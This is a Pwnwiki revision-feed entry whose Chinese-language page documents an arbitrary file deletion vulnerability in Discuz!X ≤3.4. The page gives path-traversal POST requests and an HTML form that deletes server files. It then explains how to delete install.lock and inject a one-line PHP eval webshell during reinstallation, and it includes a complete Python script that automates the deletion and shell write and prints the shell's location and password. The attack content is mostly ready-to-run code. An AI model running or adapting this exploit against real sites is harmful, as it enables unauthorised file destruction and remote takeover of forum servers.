https://pwnwiki.com/index.php?action=history&feed=atom&title=Discuz%21X_%E2%89%A43.4_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%AA%E9%99%A4%E6%BC%8F%E6%B4%9E
Discuz!X ≤3.4 任意文件刪除漏洞 - Revision history
2026-04-16T15:46:53Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Discuz!X_%E2%89%A43.4_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%AA%E9%99%A4%E6%BC%8F%E6%B4%9E&diff=129&oldid=prev
Pwnwiki: 建立內容為「==獲得用戶Hash== 在個人資料頁面 -> 審查元素 -> 搜索formhash 400px ==漏洞利用== 發送請求(XXXXXX表示Hash) <pre>…」的新頁面
2021-03-02T13:28:14Z
<p>建立內容為「==獲得用戶Hash== 在個人資料頁面 -> 審查元素 -> 搜索formhash <a href="/index.php?title=%E6%AA%94%E6%A1%88:Dz1.jpg&action=edit&redlink=1" class="new" title="檔案:Dz1.jpg (page does not exist)">400px</a> ==漏洞利用== 發送請求(XXXXXX表示Hash) <pre>…」的新頁面</p>
<p><b>New page</b></p><div>==獲得用戶Hash==<br />
在個人資料頁面 -> 審查元素 -> 搜索formhash<br />
[[檔案:Dz1.jpg |400px]]<br />
==漏洞利用==<br />
發送請求(XXXXXX表示Hash)<br />
<br />
<pre><br />
home.php?mod=spacecp&ac=profile&op=base<br />
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=XXXXXX<br />
</pre><br />
<br />
*也可以使用Burp抓包,在birthprovince處加入<code>../../../test.txt</code><br />
<br />
修改成功之後出生地就會變為<code>../../../test.txt</code><br />
[[檔案:Dz2.jpg |400px]]<br />
<br />
構造表單:<br />
<br />
<pre><br />
<form action="http://192.168.1.101/upload/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data"><br />
<input type="file" name="birthprovince" value="../../../theTestFile.txt"/><br />
<input type="hidden" name="formhash" value="XXXXXX"/><br />
<input type="hidden" name="profilesubmit" value="1"/><br />
<input type="submit" value="Submit"/><br />
</from><br />
</pre><br />
<br />
<br />
選擇隨便一張圖片上傳,點擊submit,可以發現原本的theTestFile.txt已經被刪除。<br />
<br />
<br />
==Getshell==<br />
首先構造payload刪除<code>install.lock</code><br />
<br />
[[檔案:Dz3.jpg |400px]]<br />
<br />
如果用戶沒有刪除 install 目錄,而且我們也可以利用文件刪除漏洞的話,我們就可以刪掉這個 instal.lock,然後重新安裝 Discuz。而重裝過程中一般都有寫配置文件的步驟,可能會給我們寫入一句話的機會。<br />
<br />
[[檔案:Dz4.jpg |400px]]<br />
<br />
<pre><br />
x');@eval($_POST[pwd]);('<br />
</pre><br />
<br />
<br />
<code>config/uc_config.php</code>文件中將存在一句話木馬。<br />
<br />
==Getshell EXP==<br />
<br />
<pre><br />
#!/usr/bin/env python3<br />
import base64<br />
import random<br />
import re<br />
import string<br />
<br />
<br />
import requests<br />
<br />
sess = requests.Session()<br />
randstr = lambda len=5: ''.join(random.choice(string.ascii_lowercase) for _ in range(len))<br />
<br />
##################################################<br />
########## Customize these parameters ############<br />
target = 'http://localhost/discuzx'<br />
<br />
# login target site first, and copy the cookie here<br />
<br />
cookie = "UM_distinctid=15bcd2339e93d6-07b5ae8b41447e-8373f6a-13c680-15bcd2339ea636; CNZZDATA1261218610=1456502094-1493792949-%7C1494255360; csrftoken=NotKIwodOQHO0gdMyCAxpMuObjs5RGdeEVxRlaGoRdOEeMSVRL0sfeTBqnlMjtlZ; Zy4Q_2132_saltkey=I9b3k299; Zy4Q_2132_lastvisit=1506763258; Zy4Q_2132_ulastactivity=0adb6Y1baPukQGRVYtBOZB3wmx4nVBRonRprfYWTiUaEbYlKzFWL; Zy4Q_2132_nofavfid=1; Zy4Q_2132_sid=rsQrgQ; Zy4Q_2132_lastact=1506787935%09home.php%09misc; 7Csx_2132_saltkey=U8nrO8Xr; TMT0_2132_saltkey=E3q5BpyX; PXMk_2132_saltkey=rGBnNWu7; b4Gi_2132_saltkey=adC4r05k; b4Gi_2132_lastvisit=1506796139; b4Gi_2132_onlineusernum=2; b4Gi_2132_sendmail=1; b4Gi_2132_seccode=1.8dab0a0c4ebfda651b; b4Gi_2132_sid=BywqMy; b4Gi_2132_ulastactivity=51c0lBFHqkUpD3mClFKDxwP%2BI0JGaY88XWTT1qtFBD6jAJUMphOL; b4Gi_2132_auth=6ebc2wCixg7l%2F6No7r54FCvtNKfp1e5%2FAdz2SlLqJRBimNpgrbxhSEnsH5%2BgP2mAvwVxOdrrpVVX3W5PqDhf; b4Gi_2132_creditnotice=0D0D2D0D0D0D0D0D0D1; b4Gi_2132_creditbase=0D0D0D0D0D0D0D0D0; b4Gi_2132_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; b4Gi_2132_lastcheckfeed=1%7C1506800134; b4Gi_2132_checkfollow=1; b4Gi_2132_lastact=1506800134%09misc.php%09seccode"<br />
shell_password = randstr()<br />
db_host = ''<br />
db_user = ''<br />
db_pw = ''<br />
db_name = ''<br />
#################################################<br />
<br />
path = '/home.php?mod=spacecp&ac=profile&op=base'<br />
url = target + path<br />
<br />
sess.headers.update({<br />
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',<br />
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br />
'Referer': url})<br />
<br />
<br />
# sess.proxies.update({'http': 'socks5://localhost:1080'})<br />
<br />
# sess.proxies.update({'http': 'http://localhost:8080'})<br />
<br />
<br />
def login(username=None, password=None):<br />
sess.headers.update({'Cookie': cookie})<br />
<br />
<br />
def get_form_hash():<br />
r = sess.get(url)<br />
match = re.search(r'"member.php\?mod=logging&amp;action=logout&amp;formhash=(.*?)"', r.text, re.I)<br />
if match:<br />
return match.group(1)<br />
<br />
<br />
def tamper(formhash, file_to_delete):<br />
data = {<br />
'formhash': (None, formhash),<br />
'profilesubmit': (None, 'true'),<br />
'birthprovince': (None, file_to_delete)<br />
}<br />
r = sess.post(url, files=data)<br />
if 'parent.show_success' in r.text:<br />
print('tamperred successfully')<br />
return True<br />
<br />
<br />
def delete(formhash, file):<br />
if not tamper(formhash, file):<br />
return False<br />
<br />
image = b'iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAADUlEQVR4nGNgGAWkAwABNgABVtF/yAAAAABJRU5ErkJggg=='<br />
data = {<br />
'formhash': formhash,<br />
'profilesubmit': 'true'<br />
}<br />
files = {<br />
'birthprovince': ('image.png', base64.b64decode(image), 'image/png')<br />
}<br />
r = sess.post(url, data=data, files=files)<br />
if 'parent.show_success' in r.text:<br />
print('delete {} successfully'.format(file))<br />
return True<br />
<br />
<br />
def getshell():<br />
install_url = target + '/install/index.php'<br />
r = sess.get(install_url)<br />
if '安装向导' not in r.text:<br />
print('install directory not exists')<br />
return False<br />
<br />
table_prefix = "x');@eval($_POST[{}]);('".format(shell_password)<br />
data = {<br />
'step': 3,<br />
'install_ucenter': 'yes',<br />
'dbinfo[dbhost]': db_host,<br />
'dbinfo[dbname]': db_name,<br />
'dbinfo[dbuser]': db_user,<br />
'dbinfo[dbpw]': db_pw,<br />
'dbinfo[tablepre]': table_prefix,<br />
'dbinfo[adminemail]': 'admin@admin.com',<br />
'admininfo[username]': 'admin',<br />
'admininfo[password]': 'admin',<br />
'admininfo[password2]': 'admin',<br />
'admininfo[email]': 'admin@admin.com',<br />
}<br />
r = sess.post(install_url, data=data)<br />
if '建立数据表 CREATE TABLE' not in r.text:<br />
print('write shell failed')<br />
return False<br />
print('shell: {}/config/config_ucenter.php'.format(target))<br />
print('password: {}'.format(shell_password))<br />
<br />
<br />
if __name__ == '__main__':<br />
login()<br />
form_hash = get_form_hash()<br />
if form_hash:<br />
delete(form_hash, '../../../data/install.lock')<br />
getshell()<br />
else:<br />
print('failed')<br />
</pre><br />
<br />
==參考==<br />
https://fafe.me/2017/10/02/discuz-getshell/<br />
https://chybeta.github.io/2017/10/15/DiscuzX-v3-4-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4%E6%BC%8F%E6%B4%9E/</div>
Pwnwiki